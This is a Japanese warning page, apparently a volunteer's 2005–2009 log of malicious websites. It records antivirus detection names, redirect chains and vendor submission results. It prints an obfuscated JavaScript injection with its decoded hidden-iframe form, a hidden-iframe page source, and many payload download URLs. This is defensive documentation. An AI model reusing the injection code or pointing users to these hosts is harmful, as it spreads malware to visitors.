| 通し番号. | URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説 |
← このようになっています。 |
| [2007/02/14] | 2007/02/04 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TSPY_ONLINEGA.PW として検出するよう対応、とのこと。 実際に 2007/02/04 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TSPY_ONLINEGA.PW を検出することを確認。 2007/02/04 から今日まではファイルは置き換えられていないと推測される。 |
| [2005/08/31] | スパイウェアサイトと思われる。こんな感じのキャプ画面 。
ウィルス名:TROJ_DLOADER.KZ+TROJ_ANICMOO.A+JAVA_BYTEVER.Aを検出。 しきりに下のファイルを落とそうとする。 //www.awmdabest.com/cabl/3810/tb.cab |
| [2006/10/09] | ウィルス名:WORM_RBOT.GEN |
| [2005/06/19] | ウィルス名:JAVA_BYTEVER.A
別窓はこれ → //www.allpornhere.com/?from=zedo.biz ウィルス憑きURLを呼ぶ仕掛け部分は暗号化されていて、以下のように読めないように工夫されている。 <script language=javascript>eval(String.fromCharCode( 100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,105,102, 114,97,109,101,32,98,111,114,100,101,114,61,48,32,119,105,100,116,104, 61,48,32,104,101,105,103,104,116,61,48,32,115,116,121,108,101,61,39,100, 105,115,112,108,97,121,58,110,111,110,101,39,32,115,114,99,61,39,104,116, 116,112,58,47,47,99,111,111,108,119,101,98,115,101,97,114,99,104,120,46, 98,105,122,47,107,111,114,110,47,39,62,60,47,105,102,114,97,109,101,62,34,41))</script> ↑ 上を読めるようにすると下のようになる。 ↓ document.write("<iframe border=0 width=0 height=0 style='display:none' src='http://coolwebsearchx.biz/korn/'></iframe>") |
| [2005/08/17] | 改めて確認。海外アダルトサイト。このページ自体は無害。
しかし、閉じるとランダムで色々なアダルトサイトを表示。 その中にはウィルス憑きサイトも含まれている。運が悪ければウィルス憑きサイトを表示する。 私が何回か確認した結果、ウィルス憑きサイトを表示する確率は大体10回踏んで1回の割合。 その時、検出したウィルス名は → HTML_REDIR.AI |
| [2006/01/07] | 他の方の結果では「Trojan-Downloader.JS.Phel.d など検出。」 |
| [2006/02/04] | 他の方の結果では「Kaspersky反応あり。Trojan-Downloader.JS.Agent.i 、Exploit.VBS.Phel.i 検出。」 |
| [2005/12/10] | スパイウェア配布サイトと思われる。踏むと こんな感じ のサイト。このページ表示まで無害で、普通に閉じれる。 |
| [2005/12/10] | バスター無反応だが、以下のアンチウィルスソフトで反応。
Kaspersky Anti-Virus → not-a-virus:Monitor.Win32.AdvancedCompMonitor.a |
| [2005/12/10] | バスター無反応だが、以下のアンチウィルスソフトで反応。
Kaspersky Anti-Virus → not-a-virus:Monitor.Win32.ChatWatch.422 |
| [2005/11/28] | スパイウェア配布サイトと思われる。こんな感じ のサイトで、このページ表示まで無害で、普通に閉じれる。
画面中央の「Download Zero PopUp Killer ToolBar - Click Here」をクリックすると、//www.zeropopup.com/zeropopup-setup.exe がDLされ、ウィルス名:ADW_ZEROPOP.Bを検出。ツールバーを装ったスパイウェアである。 |
| [2006/01/01] | 改めて確認。[2005/11/28]時と違う。
画面中央の「Download Zero PopUp Killer ToolBar - Click Here」をクリックしなくても //www.zeropopup.com/zeropopup-setup.exe をDLしろ、と催促してくる。 元の//www.zeropopup.com/を閉じると全画面で こんな感じ になる。 |
| [2005/11/28] | ウィルス名:SPYW_ZEROPOP.A |
| [2006/05/03] | 再確認。404になっている。 |
| [2005/11/28] | このツールバー のファイルだが、ウィルス名:ADW_ZEROPOP.Bを検出。 |
| [2007/04/03] | ウィルス名:PHP.Backdoor.Trojan [ノートン]
ウィルス名:EXPL_MS04-028.A [ウイルスバスター] IE直踏みでは真っ白なページの左上のほうに小さな黒い点のようなものを表示する。 |
| [2007/04/08] | 他の方の結果では、
「マルウェア Exploit.Win32.MS04-028.gen を発見。 「MS04-028」の脆弱性(JPEG 処理 (GDI+) のバッファ オーバーランにより、コードが実行される。)を搾取する JPEG ファイルだそうです。」 |
| [2009/01/15] | 真っ白なページだが、ウィルス名:JS_MULTIBREACH.L を検出。
このサイトは、'RealNetworks,Inc.'からの'RealPlayer plug-in for Internet Explorer'アドオンを実行しようとしている。 |
| [2005/12/21] | 中国のアダルト系サイトと思われる。こんな感じ のサイトで、画面内の画像がそれぞれ下の @ のURLに繋がるリンクになっている。
@、//www.zhangweijp.com/jpwn/index.htm 元の//www.zhangweijp.com/を閉じても @ を新窓表示する。 他の方の結果では「中国語のサイトですが、画像をクリックしたらトロイ検出。」 |
| [2005/12/20] | 踏むと真っ白なページ。バスター無反応だが、他アンチウィルスソフトで反応するらしい。
ソース内にコード変換している部分があり、読めないように工夫されている。 |
| [2005/12/21] | 他の方の結果は「インラインフレームタグで有害URLを引っ張ってくる仕掛けあり。」 |
| [2006/01/18] | 「IEで直に踏んだところトップページでトロイ系ウイルス名:Exploit-MhtRedir を検知しました。」 |
| [2006/01/20] | 「Kaspersky反応あり。Exploit.HTML.Mht 検出。」 |
| [2005/12/19] | 踏むとアダルト画像。この時点でバスター無反応だが、他アンチウィルスソフトで反応するらしい。
ソースを見ると下のようになっている。 <html> <body> <iframe src=http://www.zhangweijp.com/jp/index.htm width=0 height=0></iframe> <img src=http://www.zhangweijp.com/jpg/001.jpg></img> </body> </html> ↑ ソース内の //www.zhangweijp.com/jp/index.htm は真っ白のページ。しかし、ソース内にコード変換されている部分がある。 |
| [2005/12/19] | 他の方の結果は以下の「」内。
「IFRAMEで、何か怪しい仕掛けがしてあります。HTMファイルを拡張子を偽ってjpgと偽装していますから、ご用心。そのHTMの中で女の子の裸体画像を呼び出しています。」 |
| [2005/12/29] | 「踏むとモザイク無しエロ画像ですが、McAfeeでトロイ系ウイルス反応あり。」 |
| [2006/01/03] | 「Trojan-Downloader.Win32.Agent.acd 検出。wmfファイルからの検出なので脆弱性を狙ったウイルスのようです。」 |
| [2006/01/10] | 踏むとアダルト画像を表示。バスター無反応だが、他アンチウィルスソフトで反応するらしい。
ソースを見ると以下のURLをIFRAMEタグで呼び出している。 //www.zhangweijp.com/jp/index.htm |
| [2006/06/12] | 他の方の結果は以下の「」内。
「この //zhangweijp.com は危険な中国 (CN)サイトの一つです。過去に、色々な掲示板にURLを書き込み、トラップでトロイの木馬をインストールさせ、リネージュのアカウントとパスワードを盗み出していた事がありました。」 |
| [2005/12/20] | 踏むとアダルト画像を表示。バスター無反応だが、ノートンでは Trojan Horse として検出するらしい。 |
| [2006/01/10] | 踏むとアダルト画像を表示。バスター無反応だが、他アンチウィルスソフトで反応するらしい。
ソースを見ると以下のURLをIFRAMEタグで呼び出している。 //www.zhangweijp.com/jp/index.htm |
| [2005/12/20] | 踏むと真っ白なページ。バスター無反応だが、他アンチウィルスソフトで反応するらしい。
ソース内にコード変換している部分があり、読めないように工夫されている。 |
| [2006/01/18] | 他の方の結果は「IEで直に踏んだところトップページでトロイ系ウイルス名:Exploit-MhtRedir を検知しました。」 |
| [2006/01/20] | 「Kaspersky反応あり。Exploit.HTML.Mht 検出。」 |
| [2006/03/24] | 他の方の結果では 「Win32:Trojano-3491 [Trj] を検出。」 |
| [2006/04/01] | 「現在404エラーの模様。韓国語パックのインストを要求される。scoでは危険URL登録されていたので、踏まないほうがいいでしょう。」 |
| [2006/04/08] | 「Backdoor.Trojanバックドア型トロイの木馬。Downloader.Trojanリモートで有害プログラムDL。とりあえずこの二つ検出。」 |
| [2006/08/06] | ウィルス名:TSPY_LINEAGE.VL |
| [2005/12/20] | 踏むと真っ白なページ。バスター無反応だが、他アンチウィルスソフトで反応するらしい。
ソース内にコード変換している部分があり、読めないように工夫されている。 |
| [2006/01/18] | 他の方の結果は「IEで直に踏んだところトップページでトロイ系ウイルス名:Exploit-MhtRedir を検知しました。」 |
| [2006/01/20] | 「Kaspersky反応あり。Exploit.HTML.Mht 検出。」 |
| [2006/05/21] | このサイトは恐らく、中国系サイトと思われる。
調べてみるとWin98系なら以下の @ に、WinNT系なら以下の A に飛ぶ。 @、//www.zhangweijp.com/lineage/win98.htm A、//www.zhangweijp.com/lineage/winnt.htm 上記 @ と A のソースはコード変換されていているが、以下のURL群と関連していることが判明。 //17bs.com/door/door/win98.htm //17bs.com/door/door/winnt.htm //17bs.com/door/door/index.htm //17bs.com/door/door/w98.htm //17bs.com/door/door/wnt.htm //17bs.com/sp2/door.htm //s21.cnzz.com/stat.htm //www.17bs.com/door/door/heng.htm //www.DocURL.com/bar.htm //www.se911.com/88/image.htm //www.se911.com/88/ts.htm //www.zhangweijp.com/lineage/heng.gif |
| [2006/05/21] | 他の方の結果は以下の「」内。
「ClamWin反応あり。Exploit.Helpcontrol 複数。」 |
| [2006/09/09] | 真っ白なページ。ソースを見るとWin98系なら以下の @ に、WinNT系なら以下の A に飛ばされ、ウィルス名:BKDR_HUPIGON.GEN を検出する。
@、//www.zhangweijp.com/rbro/w98.htm A、//www.zhangweijp.com/rbro/wnt.htm |
| [2006/10/29] | 他の方の結果は以下の「」内。
「Kaspersky が遮断しているので白紙のページが表示されます。 Exploit.JS.Phel.ar を検出後、更に Trojan-Downloader.Win32.Agent.hh が検出されますので、感染してしまうと更に別のウイルスなどがインストールされる可能性があります。」 |
| [2006/08/07] | こんな感じ のサイト。環境により、ウィルス名:TSPY_LINEAGE.SU を検出する。 |
| [2006/08/07] | 2006/08/03 にトレンドマイクロ社に提出。
まだ、結果の連絡は無いが、ウィルス名:TSPY_LINEAGE.SU として対応した模様。 |
| [2006/08/08] | 今日、トレンドマイクロ社から連絡があり、パターンファイルOPR 3.639.00 にて「TSPY_LINEAGE.SU 」として検出するよう対応とのこと。 |
| [2006/09/09] | ウィルス名:BKDR_HUPIGON.GEN |
| [2006/09/09] | ウィルス名:BKDR_HUPIGON.GEN 。ソースのほとんどがコード変換されている。その中に以下の2つのURLが隠れている。
@、//www.zhangweijp.com/rbro/rbro.mp3 ← ウィルス名:BKDR_HUPIGON.GEN A、//www.5173a.com/door/index.htm ← 404だが、時間帯により、変わるかもしれない。 |
| [2006/09/09] | ウィルス名:BKDR_HUPIGON.GEN 。ソースは一部コード変換されている。その中に以下の2つのURLが隠れている。
@、//www.zhangweijp.com/rbro/rbro.mp3 ← ウィルス名:BKDR_HUPIGON.GEN A、//www.5173a.com/door/index.htm ← 404だが、時間帯により、変わるかもしれない。 |
| [2007/03/12] | ソースチェッカーでは「VBS/Psymeを発見!」と診断される。
直踏みでは真っ白のページ。ソースを見るとコード変換されている部分がある。その中に以下のURLが隠れている。 //www.zhangweijp.com/roswm/ro/ro.exe ← 確認してみると404らしかった。 |
| [2007/03/10] | ウィルス名:TSPY_AGENT.LES |
| [2007/03/10] | 踏むと真っ白なページ。ソースを見るとコード変換されている部分がある。その中に以下のURLが隠れている。
//www.zhangweijp.com/tmsn/tmsn.exe |
| [2007/03/12] | ソースチェッカーでは「VBS/Psymeを発見!」と診断される。 |
| [2007/04/15] | 再確認。ウィルス名:VBS_PSYME.HM |
| [2007/04/15] | ウィルス名:VBS_PSYME.HM |
| [2006/08/16] | 2006/08/03 にファイルをトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_ZLOB.AMO として検出するよう対応、とのこと。 2006/08/03 にDLしたファイルからウィルス名:TROJ_ZLOB.AMO を検出することを確認。 しかし、今日改めて当該URLからDLしてみたらウィルス名:TROJ_ZLOB.APZ を検出。 |
| [2009/01/31] | 2重拡張子。ウィルス名:TROJ_AGENT.AULZ |
| [2008/09/24] | ウィルス名:CRYP_MANGLED |
| [2008/09/24] | ウィルス名:CRYP_BITS |
| [2006/10/21] | 以下の他の方の結果を参照。
「洋エロサイトや大窓ポップが開き、閉じても閉じてもアラートありのページやお気に入りに登録させようとするページや、AXコントロールを実行しようとする怪しいページなどが開きます。プロセスから脱出。」 |
| [2005/11/17] | 踏むと「skl0g.zip」というファイルが落ちてくるが、ウィルス名:TROJ_SPYLUHN.Aを検出。 |
| [2005/11/17] | 踏むと「keylog5.exe」というファイルが落ちてくるが、ウィルス名:SPYW_KEYLOG5.Aを検出。 |
| [2005/11/17] | 踏むと「YSKKeyLog.zip」というファイルが落ちてくるが、ウィルス名:TSPY_PINO.11を検出。 |
| [2005/11/17] | 踏むと「homekeylogger170.zip」というファイルが落ちてくるが、ウィルス名:SPYW_FAMKEY.250+SPYW_HKLOG.170を検出。 |
| [2005/11/17] | 踏むと「SSKC2.ZIP」というファイルが落ちてくるが、ウィルス名:SPYW_TWEAKLOG.20+TROJ_SSKC.20を検出。 |
| [2005/11/17] | 踏むと「KEY.ZIP」というファイルが落ちてくるが、ウィルス名:TROJ_SMALL.Bを検出。 |
| [2004/07/20] | 海外サイトだがSPYBOT反応。スパイウェアの恐れ有り。 |
| [2005/10/23] | 再確認。ページ更新されている。SPYBOT無反応。 |
| [2005/11/29] | スパイウェア配布サイトと思われる。踏むと こんな感じ のサイト。このページまでは無害で普通に閉じれる。
ページ中央やや下の「Download Now」というリンク(ポインタが指している部分)をクリックするとツールバーexeがDL出来るが、ウィルス名:ADW_ZSEARCH.Bを検出。 |
| [2005/11/20] | ウィルス名:ADW_ZSEARCH.B |
| [2008/10/16] | ウィルス名:TROJ_SMALL.GNG |
| [2009/02/24] | ウィルス名:MAL_ZAP+BKDR_AGENT.ABJM+BKDR_ZAPCHAST.AX+BKDR_MIRCHACK.CE+TROJ_GENERIC |
| [2007/05/07] | ウィルス名:TSPY_ONLINEG.IA |
| [2007/06/02] | 2007/05/06 時点でバスターがウィルス名:Possible_Legmir1 として検出。その日にトレンドマイクロ社にファイルを提出。
2007/05/30 にその結果の連絡があり、ウィルス名:TSPY_ONLINEG.ARA として検出するよう対応、とのこと。 実際に 2007/05/06 にDLしたファイルからウィルス名:TSPY_ONLINEG.ARA を検出することを確認。 しかし、今日改めて当該URLからDLしてみると、ウィルス名:TSPY_ONLINEG.CTP を検出する。 2007/05/06 から今日までの間にファイルの置き換えが行われたと推測される。 |
| [2007/06/02] | 2007/05/06 時点でバスターがウィルス名:Possible_OLGM として検出。その日にトレンドマイクロ社にファイルを提出。
2007/05/30 にその結果の連絡があり、ウィルス名:TSPY_ONLINEG.ARB として検出するよう対応、とのこと。 実際に 2007/05/06 にDLしたファイルからウィルス名:TSPY_ONLINEG.ARB を検出することを確認。 しかし、今日改めて当該URLからDLしてみると、バスター無反応。 2007/05/06 から今日までの間にファイルの置き換えが行われたと推測される。 |
| [2007/05/07] | ウィルス名:TSPY_ONLINEG.BCB |
| [2007/06/02] | 2007/05/06 時点でバスターがウィルス名:Possible_Infostl として検出。その日にトレンドマイクロ社にファイルを提出。
2007/05/30 にその結果の連絡があり、ウィルス名:TROJ_QQPASS.BPT として検出するよう対応、とのこと。 実際に 2007/05/06 にDLしたファイルからウィルス名:TROJ_QQPASS.BPT を検出することを確認。 しかし、今日改めて当該URLからDLしてみると、バスター無反応。 2007/05/06 から今日までの間にファイルの置き換えが行われたと推測される。 |
| [2008/10/16] | 2重拡張子。ウィルス名:TROJ_RENOS.AEX |
| [2008/10/16] | ウィルス名:TROJ_SMALL.GNG |
| [2005/04/15] | ウィルス名:ADW_OPENSITE.L |
| [2005/04/15] | ウィルス名:TROJ_VB.BN |
| [2006/07/10] | 再確認。ウィルス名:TROJ_VB.DC |
| [2005/04/15] | ウィルス名:TROJ_VB.DC |